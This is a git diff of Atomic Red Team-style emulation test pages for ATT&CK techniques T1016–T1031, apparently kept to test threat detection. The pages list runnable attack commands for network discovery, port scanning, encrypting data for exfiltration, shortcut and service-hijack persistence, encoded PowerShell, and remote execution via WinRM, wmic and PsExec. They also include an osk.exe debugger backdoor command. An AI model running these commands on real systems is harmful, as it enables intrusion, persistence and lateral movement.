## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) -Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ - -Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. - -**Supported Platforms:** Windows - - +Identify network configuration information as seen by Trickbot and described +here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ +Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain` +, `nltest /domain_trusts`. Output will be via stdout. -#### Attack Commands: Run with `command_prompt`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! ```cmd ipconfig /all @@ -124,35 +100,28 @@ net view /all /domain nltest /domain_trusts ``` - - - - -

## Atomic Test #5 - List Open Egress Ports -This is to test for what ports are open outbound. The technique used was taken from the following blog: + +This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ -Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. +Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. +Output will be to Desktop\open-ports.txt. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | Path | PathToAtomicsFolder\T1016\src\top-128.txt| | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt| | output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $ports = Get-content #{port_file} @@ -184,25 +153,26 @@ Write-Host $results ``` #### Cleanup Commands: + ```powershell Remove-Item -ErrorAction ignore "#{output_file}" ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Test requires #{port_file} to exist + ##### Check Prereq Commands: + ```powershell if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1018.md b/Atomic_Threat_Coverage/Triggers/T1018.md index 8ddf3733..df86a161 100644 --- a/Atomic_Threat_Coverage/Triggers/T1018.md +++ b/Atomic_Threat_Coverage/Triggers/T1018.md @@ -1,22 +1,31 @@ # T1018 - Remote System Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018) +
Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. ### Windows -Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system. +Examples of tools and commands that acquire this information include "ping" or "net view" +using [Net](https://attack.mitre.org/software/S0039). The contents of the C: +\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings +on the system. ### Mac -Specific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. +Specific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast +domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of +the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Linux -Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. +Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the +/etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Cloud -In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs with information about remote systems and services. +In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating +system. In addition, cloud environments often provide APIs with information about remote systems and services.
## Atomic Tests @@ -37,210 +46,149 @@ In cloud environments, the above techniques may be used to discover remote syste - [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup) -
## Atomic Test #1 - Remote System Discovery - net + Identify remote systems with net.exe. -Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. +Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that +have file and print sharing enabled. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net view /domain net view ``` - - - - -

## Atomic Test #2 - Remote System Discovery - net group Domain Computers + Identify remote systems with net.exe querying the Active Directory Domain Computers group. -Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. +Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. +Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net group "Domain Computers" /domain ``` - - - - -

## Atomic Test #3 - Remote System Discovery - nltest + Identify domain controllers for specified domain. -Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. +Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain +controllers. Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_domain | Domain to query for domain controllers | String | domain.local| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd nltest.exe /dclist:#{target_domain} ``` - - - - -

## Atomic Test #4 - Remote System Discovery - ping sweep + Identify remote systems via ping sweep. -Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. +Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via +stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ``` - - - - -

## Atomic Test #5 - Remote System Discovery - arp -Identify remote systems via arp. + +Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd arp -a ``` - - - - -

## Atomic Test #6 - Remote System Discovery - arp nix + Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh arp -a | grep -v '^?' ``` - - - - -

## Atomic Test #7 - Remote System Discovery - sweep + Identify remote systems via ping sweep. -Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. +Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ``` - - - - -

## Atomic Test #8 - Remote System Discovery - nslookup -Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. - -Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. - -**Supported Platforms:** Windows +Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in +ipconfig. +Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute +nslookup against that IP range. Output will be via stdout. +**Supported Platforms:** Windows - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] @@ -251,9 +199,4 @@ $thirdOctet = $pieces[2] foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1022.md b/Atomic_Threat_Coverage/Triggers/T1022.md index e43b3c37..f4f9ac36 100644 --- a/Atomic_Threat_Coverage/Triggers/T1022.md +++ b/Atomic_Threat_Coverage/Triggers/T1022.md @@ -1,8 +1,12 @@ # T1022 - Data Encrypted + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1022) +
Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip. -Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
+Other exfiltration techniques likely apply as well to transfer the information out of the network, such +as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) +and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
## Atomic Tests @@ -14,20 +18,15 @@ Other exfiltration techniques likely apply as well to transfer the information o - [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip) -
## Atomic Test #1 - Data Encrypted with zip and gpg symmetric + Encrypt data for exiltration **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh mkdir /tmp/victim-files @@ -42,29 +41,22 @@ ls -l ``` #### Cleanup Commands: + ```sh rm -Rf /tmp/victim-files ``` - - - -

## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar + Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mkdir .\tmp\victim-files @@ -74,33 +66,25 @@ rar a -hp"blue" hello.rar dir ``` - - - - -

## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip + Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe| | winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe| | winzip_hash | File hash of the Windows Credential Editor zip file | String | B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd path=%path%;"C:\Program Files (x86)\winzip" @@ -111,16 +95,18 @@ echo "This file will be encrypted" > .\encrypted_file.txt dir ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Winzip must be installed + ##### Check Prereq Commands: + ```powershell cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' ``` + ##### Get Prereq Commands: + ```powershell if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -128,23 +114,16 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h } ``` - - -

## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip + Note: Requires 7zip installation **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mkdir $PathToAtomicsFolder\T1022\victim-files @@ -154,9 +133,4 @@ echo "This file will be encrypted" > .\encrypted_file.txt dir ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1023.md b/Atomic_Threat_Coverage/Triggers/T1023.md index 39176721..fb0a1fb1 100644 --- a/Atomic_Threat_Coverage/Triggers/T1023.md +++ b/Atomic_Threat_Coverage/Triggers/T1023.md @@ -1,5 +1,7 @@ # T1023 - Shortcut Modification + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1023) +
Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.
## Atomic Tests @@ -8,27 +10,24 @@ - [Atomic Test #2 - Create shortcut to cmd in startup folders](#atomic-test-2---create-shortcut-to-cmd-in-startup-folders) -
## Atomic Test #1 - Shortcut Modification -This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + +This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with +powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | shortcut_file_path | shortcut modified and execute | path | %temp%\T1023_modified_shortcut.url| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo [InternetShortcut] > #{shortcut_file_path} @@ -37,29 +36,23 @@ echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} ``` #### Cleanup Commands: + ```cmd del -f #{shortcut_file_path} >nul 2>&1 ``` - - - -

## Atomic Test #2 - Create shortcut to cmd in startup folders -LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + +LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to " +%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $Shell = New-Object -ComObject ("WScript.Shell") @@ -80,13 +73,10 @@ $ShortCut.Save() ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1027.md b/Atomic_Threat_Coverage/Triggers/T1027.md index c4d5759b..bc278a57 100644 --- a/Atomic_Threat_Coverage/Triggers/T1027.md +++ b/Atomic_Threat_Coverage/Triggers/T1027.md @@ -1,14 +1,35 @@ # T1027 - Obfuscated Files or Information -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027) -
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. - -Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript. -Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027) -Adversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017) +
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. -Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)
+Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during +Initial Access or later to mitigate detection. Sometimes a user's action may be required to open +and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) +for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to +open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke +November 2016) Adversaries may also used compressed or archived scripts, such as Javascript. + +Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with +discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly +benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) + +Adversaries may also obfuscate commands executed from payloads or directly via +a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and +other platform/language specific semantics can be used to evade signature based detections and whitelisting +mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: +PaloAlto EncodedCommand March 2017) + +Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, +audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography +activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered +information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. ( +Citation: Wikipedia Duqu) By the end of 2017, an adversary group +used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and +execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script +to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious +Doc Targets Pyeongchang Olympics)
## Atomic Tests @@ -18,22 +39,18 @@ Another example of obfuscation is through the use of steganography, a technique - [Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3---execute-base64-encoded-powershell-from-windows-registry) -
## Atomic Test #1 - Decode base64 Data into Script + Creates a base64-encoded data file and decodes it into an executable shell script -Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. +Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that +stdouts `echo Hello from the Atomic Red Team`. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" @@ -42,32 +59,24 @@ chmod +x /tmp/art.sh /tmp/art.sh ``` - - - - -

## Atomic Test #2 - Execute base64-encoded PowerShell + Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $OriginalCommand = '#{powershell_command}' @@ -77,34 +86,27 @@ $EncodedCommand powershell.exe -EncodedCommand $EncodedCommand ``` - - - - -

## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry -Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. + +Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by +numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion| | registry_entry_storage | Windows Registry entry to store code under key | String | Debug| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $OriginalCommand = '#{powershell_command}' @@ -117,12 +119,9 @@ powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::From ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1028.md b/Atomic_Threat_Coverage/Triggers/T1028.md index 43d82678..40078ca4 100644 --- a/Atomic_Threat_Coverage/Triggers/T1028.md +++ b/Atomic_Threat_Coverage/Triggers/T1028.md @@ -1,5 +1,7 @@ # T1028 - Windows Remote Management + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028) +
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)
## Atomic Tests @@ -14,36 +16,27 @@ - [Atomic Test #5 - Invoke-Command](#atomic-test-5---invoke-command) -
## Atomic Test #1 - Enable Windows Remote Management + Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Enable-PSRemoting -Force ``` - - - - -

## Atomic Test #2 - PowerShell Lateral Movement + Powershell lateral movement using the mmc20 application com object. Reference: @@ -54,74 +47,57 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of Computer | string | computer1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ``` - - - - -

## Atomic Test #3 - WMIC Process Call Create + Utilize WMIC to start remote process. -Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. +Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with +cmd.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ``` - - - - -

## Atomic Test #4 - Psexec + Utilize psexec to start remote process. Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| @@ -129,24 +105,24 @@ Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a rem | computer_name | Target Computer Name | String | localhost| | psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd #{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe ``` - - - #### Dependencies: Run with `command_prompt`! + ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + ##### Check Prereq Commands: + ```cmd if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```cmd Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -154,39 +130,28 @@ New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force ``` - - -

## Atomic Test #5 - Invoke-Command + Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_name | Remote Windows Host Name | String | localhost| | remote_command | Command to execute on remote Host | String | ipconfig| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1030.md b/Atomic_Threat_Coverage/Triggers/T1030.md index 7e15333b..2e6a7132 100644 --- a/Atomic_Threat_Coverage/Triggers/T1030.md +++ b/Atomic_Threat_Coverage/Triggers/T1030.md @@ -1,25 +1,22 @@ # T1030 - Data Transfer Size Limits + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030) +
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
## Atomic Tests - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) -
## Atomic Test #1 - Data Transfer Size Limits + Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd /tmp/ @@ -28,9 +25,4 @@ split -b 5000000 /tmp/victim-whole-file ls -l ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1031.md b/Atomic_Threat_Coverage/Triggers/T1031.md index c7a696c4..09ca0a9e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1031.md +++ b/Atomic_Threat_Coverage/Triggers/T1031.md @@ -1,19 +1,26 @@ # T1031 - Modify Existing Service + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1031) +
Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). -Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. +Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom +tools to interact with the Windows API. Use of existing services is a type +of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. +Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not +commonly used. -Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
+Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: +Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013) ## Atomic Tests - [Atomic Test #1 - Modify Fax service to run PowerShell](#atomic-test-1---modify-fax-service-to-run-powershell) -
## Atomic Test #1 - Modify Fax service to run PowerShell + This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. @@ -21,12 +28,7 @@ Upon successful execution, cmd will modify the binpath for `Fax` to spawn powers **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" @@ -34,12 +36,9 @@ sc start Fax ``` #### Cleanup Commands: + ```cmd sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1 ``` - - - -
